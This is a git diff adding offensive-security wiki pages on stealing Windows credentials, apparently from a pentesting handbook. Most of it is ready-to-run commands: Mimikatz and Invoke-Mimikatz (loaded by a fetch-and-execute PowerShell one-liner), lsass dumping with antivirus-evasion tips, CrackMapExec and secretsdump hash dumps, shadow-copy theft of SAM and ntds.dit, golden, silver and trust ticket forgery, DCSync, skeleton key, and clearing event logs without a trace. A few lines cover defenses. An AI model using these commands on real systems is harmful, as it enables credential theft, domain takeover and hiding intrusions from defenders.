+All this information was extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+
diff --git a/windows/stealing-credentials/README.md b/windows/stealing-credentials/README.md
new file mode 100644
index 00000000..4d821fec
--- /dev/null
+++ b/windows/stealing-credentials/README.md
@@ -0,0 +1,279 @@
+# Stealing Credentials
+
+## Credentials Mimikatz
+
+```bash
+#Elevate Privileges to extract the credentials
+privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
+token::elevate
+#Extract from lsass (memory)
+sekurlsa::logonpasswords
+#Extract from SAM
+lsadump::sam
+#One liner
+mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
+```
+
+**Find other things that Mimikatz can do in** [**this page**](credentials-mimikatz.md)**.**
+
+### Invoke-Mimikatz
+
+```bash
+IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
+Invoke-Mimikatz -DumpCreds #Dump creds from memory
+Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'
+```
+
+[**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.**
+
+## Credentials with Meterpreter
+
+Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **that** I have created to **search for passwords and hashes** inside the victim.
+
+```bash
+#Credentials from SAM
+post/windows/gather/smart_hashdump
+hashdump
+
+#Using kiwi module
+load kiwi
+creds_all
+kiwi_cmd "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam"
+
+#Using Mimikatz module
+load mimikatz
+mimikatz_command -f "sekurlsa::logonpasswords"
+mimikatz_command -f "lsadump::sam"
+```
+
+## Bypassing AV
+
+### Procdump + Mimikatz
+
+As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender.   
+You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally** from the dump.
+
+{% code title="Dump lsass" %}
+```bash
+#Local
+C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
+#Remote, mount https://live.sysinternals.com which contains procdump.exe
+net use Z: https://live.sysinternals.com
+Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
+```
+{% endcode %}
+
+{% code title="Extract credentials from the dump" %}
+```c
+//Load the dump
+mimikatz # sekurlsa::minidump lsass.dmp
+//Extract credentials
+mimikatz # sekurlsa::logonPasswords
+```
+{% endcode %}
+
+This process is done automatically with [SprayKatz](https://github.com/aas-n/spraykatz): `./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24`
+
+**Note**: Some **AV** may **detect** as **malicious** the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting** the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier** to **pass** as an **argument** the **PID** of lsass.exe to procdump **instead o**f the **name lsass.exe.**
+
+### Dumping lsass with **comsvcs.dll**
+
+There’s a DLL called **comsvcs.dll**, located in `C:\Windows\System32` that **dumps process memory** whenever they **crash**. This DLL contains a **function** called **`MiniDumpW`** that is written so it can be called with `rundll32.exe`.  
+The first two arguments are not used, but the third one is split into 3 parts. First part is the process ID that will be dumped, second part is the dump file location, and third part is the word **full**. There is no other choice.  
+Once these 3 arguments has been parsed, basically this DLL creates the dump file, and dumps the specified process into that dump file.  
+Thanks to this function, we can use **comsvcs.dll** to dump lsass process instead of uploading procdump and executing it. \(This information was extracted from [https://en.hackndo.com/remote-lsass-dump-passwords/](https://en.hackndo.com/remote-lsass-dump-passwords/)\)
+
+```text
+rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
+```
+
+We just have to keep in mind that this technique can only be executed as **SYSTEM**.
+
+**You can automate this process with** [**lssasy**](https://github.com/Hackndo/lsassy)**.**
+
+## CrackMapExec
+
+### Dump SAM hashes
+
+```text
+cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
+```
+
+### Dump LSA secrets
+
+```text
+cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
+```
+
+### Dump the NTDS.dit from target DC
+
+```text
+cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
+#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
+```
+
+### Dump the NTDS.dit password history from target DC 
+
+```text
+#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
+```
+
+### Show the pwdLastSet attribute for each NTDS.dit account
+
+```text
+#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
+```
+
+## Stealing SAM & SYSTEM
+
+This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected.
+
+### From Registry
+
+The easiest way to steal those files is to get a copy from the registry:
+
+```text
+reg save HKLM\sam sam
+reg save HKLM\system system
+```
+
+**Download** those files to your Kali machine and **extract the hashes** using:
+
+```text
+samdump2 SYSTEM SAM
+```
+
+### Volume Shadow Copy
+
+You can perform copy of protected files using this service. You need to be Administrator.
+
+#### Using vssadmin
+
+vssadmin binary is only available in Windows Server versions
+
+```bash
+vssadmin create shadow /for=C:
+#Copy SAM
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SAM
+#Copy SYSTEM
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
+#Copy ntds.dit
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit
+```
+
+  
+But you can do the same from **Powershell**. This is an example of **how to copy the SAM file** \(the hard drive used is "C:" and its saved to C:\users\Public\) but you can use this for copying any protected file:
+
+```bash
+$service=(Get-Service -name VSS)
+if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
+$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
+$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
+cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
+$voume.Delete();if($notrunning -eq 1){$service.Stop()}
+```
+
+Code from the book: [https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)
+
+### Invoke-NinjaCopy
+
+Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) to make a copy of SAM, SYSTEM and ntds.dit.
+
+```bash
+Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"
+```
+
+## **Active Directory Credentials - NTDS.dit**
+
+**The Ntds.dit file is a database that stores Active Directory data**, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
+
+The important NTDS.dit file will be **located in**: _%SystemRoom%/NTDS/ntds.dit_  
+This file is a database _Extensible Storage Engine_ \(ESE\) and is "officially" composed by 3 tables:
+
+* **Data Table**: Contains the information about the objects \(users, groups...\)
+* **Link Table**: Information about the relations \(member of...\)
+* **SD Table**: Contains the security descriptors of each object
+
+More information about this: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/)
+
+Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the** _**lsass**_ **memory** \(you can find the lastet accessed data probably because of the performance impruve by using a **cache**\).
+
+#### Decrypting the hashes inside NTDS.dit
+
+The hash is cyphered 3 times:
+
+1. Decrypt Password Encryption Key \(**PEK**\) using the **BOOTKEY** and **RC4**.
+2. Decrypt tha **hash** using **PEK** and **RC4**.
+3. Decrypt the **hash** using **DES**.
+
+**PEK** have the **same value** in **every domain controller**, but it is **cyphered** inside the **NTDS.dit** file using the **BOOTKEY** of the **SYSTEM file of the domain controller \(is different between domain controllers\)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM** \(_C:\Windows\System32\config\SYSTEM_\).
+
+### Copying NTDS.dit using Ntdsutil
+
+Available since Windows Server 2008.
+
+```bash
+ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
+```
+
+You could also use the [**volume shadow copy**](./#stealing-sam-and-system) ****trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** \(again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) ****trick\).
+
+### **Extracting hashes from NTDS.dit**
+
+Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**:
+
+```bash
+secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile credentials.txt
+```
+
+You can also **extract them automatically** using a valid domain admin user:
+
+```text
+secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>
+```
+
+For **big NTDS.dit files** it's recommend to extract it using [gosecretsdump](https://github.com/c-sto/gosecretsdump).
+
+Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject` 
+
+## Lazagne
+
+Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases). you can use this binary to extract credentials from several software.
+
+```text
+lazagne.exe all
+```
+
+## Other tools for extracting credentials from SAM and LSASS
+
+### Windows credentials Editor \(WCE\)
+
+This tool can be used to extract credentials from the memory. Download it from: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/)
+
+### fgdump
+
+Extract credentials from the SAM file
+
+```text
+You can find this binary inside Kali, just do: locate fgdump.exe
+fgdump.exe
+```
+
+### PwDump
+
+Extract credentials from the SAM file
+
+```text
+You can find this binary inside Kali, just do: locate pwdump.exe
+PwDump.exe -o outpwdump -x 127.0.0.1
+type outpwdump
+```
+
+### PwDump7
+
+Download it from:[ http://www.tarasco.org/security/pwdump\_7](%20http://www.tarasco.org/security/pwdump_7) and just **execute it** and the passwords will be extracted.
+
+## Defenses
+
+\*\*\*\*[**Learn about some credentials protections here.**](credentials-protections.md)\*\*\*\*
+
diff --git a/windows/stealing-credentials/credentials-mimikatz.md b/windows/stealing-credentials/credentials-mimikatz.md
new file mode 100644
index 00000000..ae4b5002
--- /dev/null
+++ b/windows/stealing-credentials/credentials-mimikatz.md
@@ -0,0 +1,320 @@
+# Mimikatz
+
+The content of this page was copied [adsecurity.org](https://adsecurity.org/?page_id=1821)
+
+## LM and Clear-Text in memory
+
+Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory.
+
+In order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” \(Digest Disabled\):
+
+_HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”\(DWORD\)_
+
+## **Mimikatz & LSA Protection:**
+
+Windows Server 2012 R2 and Windows 8.1 includes a new feature called LSA Protection which involves enabling [LSASS as a protected process on Windows Server 2012 R2](https://technet.microsoft.com/en-us/library/dn408187.aspx) \(Mimikatz can bypass with a driver, but that should make some noise in the event logs\):
+
+_The LSA, which includes the Local Security Authority Server Service \(LSASS\) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages._
+
+Enabling LSA protection:
+
+1. Open the Registry Editor \(RegEdit.exe\), and navigate to the registry key that is located at: HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and Set the value of the registry key to: “RunAsPPL”=dword:00000001.
+2. Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In the Hive list, click HKEY\_LOCAL\_MACHINE. In the Key Path list, browse to SYSTEM\CurrentControlSet\Control\Lsa.  In the Value name box, type RunAsPPL. In the Value type box, click the REG\_DWORD. In the Value data box, type 00000001.Click OK.
+
+LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver \(“!+”\).
+
+[![Mimikatz-Driver-Remove-LSASS-Protection](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg)
+
+## Main
+
+### **EVENT**
+
+**EVENT::Clear** – Clear an event log  
+[  
+![Mimikatz-Event-Clear](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png)
+
+**EVENT:::Drop** – \(_**experimental**_\) Patch Events service to avoid new events
+
+[![Mimikatz-Event-Drop](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png)
+
+Note:  
+Run privilege::debug then event::drop to patch the event log.  Then run Event::Clear to clear the event log without any log cleared event \(1102\) being logged.
+
+### KERBEROS
+
+#### Golden Ticket
+
+A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign.
+
+A Golden Ticket \(GT\) can be created to impersonate any user \(real or imagined\) in the domain as a member of any group in the domain \(providing a virtually unlimited amount of rights\) to any and every resource in the domain.
+
+**Mimikatz Golden Ticket Command Reference:**
+
+The Mimikatz command to create a golden ticket is “kerberos::golden”
+
+* /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.
+* /sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.
+* /sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1473643419-774954089-5872329127-519”. T[his parameter adds the provided SIDs to the SID History parameter.](https://adsecurity.org/?p=1640)
+* /user – username to impersonate
+* /groups \(optional\) – group RIDs the user is a member of \(the first is the primary group\). Add user or computer account RIDs to receive the same access. Default Groups: 513,512,520,518,519 for the well-known Administrator’s groups \(listed below\).
+* /krbtgt – NTLM password hash for the domain KDC service account \(KRBTGT\). Used to encrypt and sign the TGT.
+* /ticket \(optional\) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.
+* /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.
+* /id \(optional\) – user RID. Mimikatz default is 500 \(the default Administrator account RID\).
+* /startoffset \(optional\) – the start offset when the ticket is available \(generally set to –10 or 0 if this option is used\). Mimikatz Default value is 0.
+* /endin \(optional\) – ticket lifetime. Mimikatz Default value is 10 years \(~5,262,480 minutes\). Active Directory default Kerberos policy setting is 10 hours \(600 minutes\).
+* /renewmax \(optional\) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years \(~5,262,480 minutes\). Active Directory default Kerberos policy setting is 7 days \(10,080 minutes\).
+* /sids \(optional\) – set to be the SID of the Enterprise Admins group in the AD forest \(\[ADRootDomainSID\]-519\) to spoof Enterprise Admin rights throughout the AD forest \(AD admin in every domain in the AD Forest\).
+* /aes128 – the AES128 key
+* /aes256 – the AES256 key
+
+Golden Ticket Default Groups:
+
+* Domain Users SID: S-1-5-21&lt;DOMAINID&gt;-513
+* Domain Admins SID: S-1-5-21&lt;DOMAINID&gt;-512
+* Schema Admins SID: S-1-5-21&lt;DOMAINID&gt;-518
+* Enterprise Admins SID: S-1-5-21&lt;DOMAINID&gt;-519  \(this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights\)
+* Group Policy Creator Owners SID: S-1-5-21&lt;DOMAINID&gt;-520
+
+```text
+.\mimikatz "kerberos::golden /User:Administrator /domain:rd.lab.adsecurity.org /id:512 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
+```
+
+[Golden tickets across domains](https://adsecurity.org/?p=1640)
+
+#### Silver Ticket
+
+A Silver Ticket is a TGS \(similar to TGT in format\) using the target service account’s \(identified by SPN mapping\) NTLM password hash to encrypt and sign.
+
+**Example Mimikatz Command to Create a Silver Ticket:**
+
+The following Mimikatz command creates a Silver Ticket for the CIFS service on the server adsmswin2k8r2.lab.adsecurity.org. In order for this Silver Ticket to be successfully created, the AD computer account password hash for adsmswin2k8r2.lab.adsecurity.org needs to be discovered, either from an AD domain dump or by running Mimikatz on the local system as shown above \(_Mimikatz “privilege::debug” “sekurlsa::logonpasswords” exit_\). The NTLM password hash is used with the /rc4 paramteer. The service SPN type also needs to be identified in the /service parameter. Finally, the target computer’s fully-qualified domain name needs to be provided in the /target parameter. Don’t forget the domain SID in the /sid parameter.
+
+```text
+mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit
+```
+
+#### \*\*\*\*[**Trust Ticket**](https://adsecurity.org/?p=1588)\*\*\*\*
+
+Once the Active Directory Trust password hash is determined, a trust ticket can be generated. The trust tickets are created using the shared password between 2 Domains that trust each other.  
+****[More background on Trust Tickets.](https://adsecurity.org/?p=1588)
+
+**Dumping trust passwords \(trust keys\)**
+
+```text
+Mimikatz “privilege::debug” “lsadump::trust /patch” exit
+```
+
+**Create a forged trust ticket \(inter-realm TGT\) using Mimikatz**
+
+Forge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest \(leveraging SIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz\). This enables full administrative access from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is effectively a Golden Ticket across the trust.
+
+```text
+Mimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit
+```
+
+Trust Ticket Specific Required Parameters:
+
+* **/**target – the target domain’s FQDN.
+* **/**service – the kerberos service running in the target domain \(krbtgt\).
+* **/**rc4 – the NTLM hash for the service kerberos service account \(krbtgt\).
+* **/**ticket – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.
+
+#### **More KERBEROS**
+
+**KERBEROS::List** – List all user tickets \(TGT and TGS\) in user memory. No special privileges required since it only displays the current user’s tickets.  
+****Similar to functionality of “klist”.
+
+**KERBEROS::PTC** – pass the cache \(NT6\)  
+\*Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.
+
+A good example of Mimikatz’s kerberos::ptc is when [exploiting MS14-068 with PyKEK](https://adsecurity.org/?p=676). PyKEK generates a ccache file which can be injected with Mimikatz using kerberos::ptc.
+
+[![Mimikatz-PTC-PyKEK-ccacheFile](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg)
+
+**KERBEROS::PTT** – pass the ticket  
+After a [Kerberos ticket is found](https://adsecurity.org/?p=1667), it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required.  
+Similar to SEKURLSA::PTH \(Pass-The-Hash\).
+
+* /filename – the ticket’s filename \(can be multiple\)
+* /diretory – a directory path, all .kirbi files inside will be injected.
+
+[![KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2](https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png)](https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png)
+
+**KERBEROS::Purge** – purge all Kerberos tickets  
+Similar to functionality of “klist purge”. Run this command before passing tickets \(PTC, PTT, etc\) to ensure the correct user context is used.
+
+[![Mimikatz-Kerberos-Purge](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png)
+
+**KERBEROS::TGT** – get current TGT for current user.
+
+[![Mimikatz-Kerberos-TGT](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png)
+
+### LSADUMP
+
+**LSADUMP**::**DCShadow** – Set the current machines as DC to have the habitability to create new objects inside the DC \(persistent method\).  
+This requires full AD admin rights or KRBTGT pw hash.  
+DCShadow temporarily sets the computer to be a “DC” for the purposes of replication:
+
+* Creates 2 objects in the AD forest Configuration partition.
+* Updates the SPN of the computer used to include “GC” \(Global Catalog\) and “E3514235-4B06-11D1-AB04-00C04FC2DCD2” \(AD Replication\). More info on Kerberos Service Principal Names in the [ADSecurity SPN section](https://adsecurity.org/?page_id=183).
+* Pushes the updates to DCs via DrsReplicaAdd and KCC.
+* Removes the created objects from the Configuration partition.
+
+**LSADUMP::DCSync** – ask a DC to synchronize an object \(get password data for account\)  
+[Requires membership in Domain Administrator, domain Administrators, or custom delegation.](https://adsecurity.org/?p=1729)
+
+A major feature added to Mimkatz in August 2015 is “DCSync” which effectively “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller.
+
+**DCSync Options:**
+
+* /all – DCSync pull data for the entire domain.
+* /user – user id or SID of the user you want to pull the data for.
+* /domain \(optional\) – FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to connect to. If this parameter is not provided, Mimikatz defaults to the current domain.
+* /csv – export to csv
+* /dc \(optional\) – Specify the Domain Controller you want DCSync to connect to and gather data.
+
+There’s also a /guid parameter.
+
+**DCSync Command Examples:**
+
+Pull password data for the KRBTGT user account in the rd.adsecurity.org domain:  
+_Mimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt” exit_
+
+Pull password data for the Administrator user account in the rd.adsecurity.org domain:  
+_Mimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator” exit_
+
+Pull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain:  
+_Mimikatz  “lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$” exit_
+
+**LSADUMP::LSA** – Ask LSA Server to retrieve SAM/AD enterprise \(normal, patch on the fly or inject\). Use /patch for a subset of data, use /inject for everything. _Requires System or Debug rights._
+
+* /inject – Inject LSASS to extract credentials
+* /name – account name for target user account
+* /id – RID for target user account
+* /patch – patch LSASS.
+
+Often service accounts are members of Domain Admins \(or equivalent\) or a Domain Admin was recently logged on to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden Tickets.
+
+```text
+mimikatz lsadump::lsa /inject exit
+```
+
+**LSADUMP::NetSync**
+
+NetSync provides a simple way to use a DC computer account password data to impersonate a Domain Controller via a Silver Ticket and DCSync the target account’s information including the password data_._
+
+**LSADUMP::SAM** – get the SysKey to decrypt SAM entries \(from registry or hive\). The SAM option connects to the local Security Account Manager \(SAM\) database and dumps credentials for local accounts.
+
+**LSADUMP::Secrets** – get the SysKey to decrypt SECRETS entries \(from registry or hives\).
+
+**LSADUMP::SetNTLM** – Ask a server to set a new password/ntlm for one user.
+
+[**LSADUMP::Trust**](https://adsecurity.org/?p=1588) – Ask LSA Server to retrieve Trust Auth Information \(normal or patch on the fly\).
+
+### MISC
+
+[**MISC::Skeleton**](https://adsecurity.org/?p=1275) – Inject Skeleton Key into LSASS process on Domain Controller.
+
+```text
+"privilege::debug" "misc::skeleton"
+```
+
+### PRIVILEGE
+
+**PRIVILEGE::Backup** – get backup privilege/rights. Requires Debug rights.
+
+**PRIVILEGE::Debug** – get debug rights \(this or Local System rights is required for many Mimikatz commands\).
+
+### SEKURLSA
+
+**SEKURLSA::Credman** – List Credentials Manager
+
+**SEKURLSA::Ekeys** – list Kerberos encryption keys
+
+**SEKURLSA::Kerberos** – List Kerberos credentials for all authenticated users \(including services and computer account\)
+
+**SEKURLSA::Krbtgt** – get Domain Kerberos service account \(KRBTGT\)password data
+
+**SEKURLSA::SSP** – Lists SSP credentials
+
+**SEKURLSA::Wdigest** – List WDigest credentials
+
+**SEKURLSA::LogonPasswords** – lists all available provider credentials. This usually shows recently logged on user and computer credentials.
+
+* Dumps password data in LSASS for currently logged on \(or recently logged on\) accounts as well as services running under the context of user credentials.
+* Account passwords are stored in memory in a reversible manner. If they are in memory \(prior to Windows 8.1/Windows Server 2012 R2 they were\), they are displayed. Windows 8.1/Windows Server 2012 R2 doesn’t store the account password in this manner in most cases. KB2871997 “back-ports” this security capability to  Windows 7, Windows 8, Windows Server 2008R2, and Windows Server 2012, though the computer needs additional configuration after applying KB2871997.
+* Requires administrator access \(with debug rights\) or Local SYSTEM rights
+
+**SEKURLSA::Minidump** – switch to LSASS minidump process context \(read lsass dump\)
+
+**SEKURLSA::Pth** – Pass-the-Hash and Over-Pass-the-Hash \(aka pass the key\).
+
+_Mimikatz can perform the well-known operation ‘Pass-The-Hash’ to run a process under another credentials with NTLM hash of the user’s password, instead of its real password. For this, it starts a process with a fake identity, then replaces fake information \(NTLM hash of the fake password\) with real information \(NTLM hash of the real password\)._
+
+* /user – the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account.
+* /domain – the fully qualified domain name – without domain or in case of local user/admin, use computer or server name, workgroup or whatever.
+* /rc4 or /ntlm – optional – the RC4 key / NTLM hash of the user’s password.
+* /run – optional – the command line to run – default is: cmd to have a shell.
+
+[![Mimikatz-Sekurlsa-PTH](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg)
+
+**SEKURLSA::Tickets** – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account.  
+Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions \(users\).
+
+* /export – optional – tickets are exported in .kirbi files. They start with user’s LUID and group number \(0 = TGS, 1 = client ticket\(?\) and 2 = TGT\)
+
+Similar to credential dumping from LSASS, using the sekurlsa module, an attacker can get all Kerberos ticket data in memory on a system, including those belonging to an admin or service.  
+This is extremely useful if an attacker has compromised a web server configured for Kerberos delegation that users access with a backend SQL server. This enables an attacker to capture and reuse all user tickets in memory on that server.
+
+The “kerberos::tickets” mimikatz command dumps the current logged-on user’s Kerberos tickets and does not require elevated rights. Leveraging the sekurlsa module’s capability to read from protected memory \(LSASS\), all Kerberos tickets on the system can be dumped.
+
+Command:  _mimikatz sekurlsa::tickets exit_
+
+* Dumps all authenticated Kerberos tickets on a system.
+* Requires administrator access \(with debug\) or Local SYSTEM rights
+
+### **SID**
+
+The Mimikatz SID module replaces MISC::AddSID. Use SID::Patch to patch the ntds service.
+
+**SID::add** – Add a SID to SIDHistory of an object
+
+[![Mimikatz-SID-add](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png)
+
+**SID::modify** – Modify object SID of an object
+
+[![Mimikatz-SID-Modify](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png)
+
+### **TOKEN**
+
+The Mimikatz Token module enables Mimikatz to interact with Windows authentication tokens, including grabbing and impersonating existing tokens.
+
+**TOKEN::Elevate** – impersonate a token. Used to elevate permissions to SYSTEM \(default\) or find a domain admin token on the box using the Windows API.  
+_Requires Administrator rights._
+
+[![Mimikatz-Token-Elevate1](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1.png)
+
+Find a domain admin credential on the box and use that token: _token::elevate /domainadmin_
+
+[![Mimikatz-Token-Elevate-DomainAdmin](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin.jpg)
+
+**TOKEN::List** – list all tokens of the system
+
+### **TS**
+
+**TS::MultiRDP** – \(experimental\) Patch Terminal Server service to allow multiple users
+
+[![Mimikatz-TS-MultiRDP](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-TS-MultiRDP.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-TS-MultiRDP.png)
+
+**TS::Sessions** – List TS/RDP sessions.
+
+![](https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-TS-Sessions.png)
+
+  
+  
+  
+
+
+
+
diff --git a/windows/stealing-credentials/credentials-protections.md b/windows/stealing-credentials/credentials-protections.md
new file mode 100644
index 00000000..c75c5697
--- /dev/null
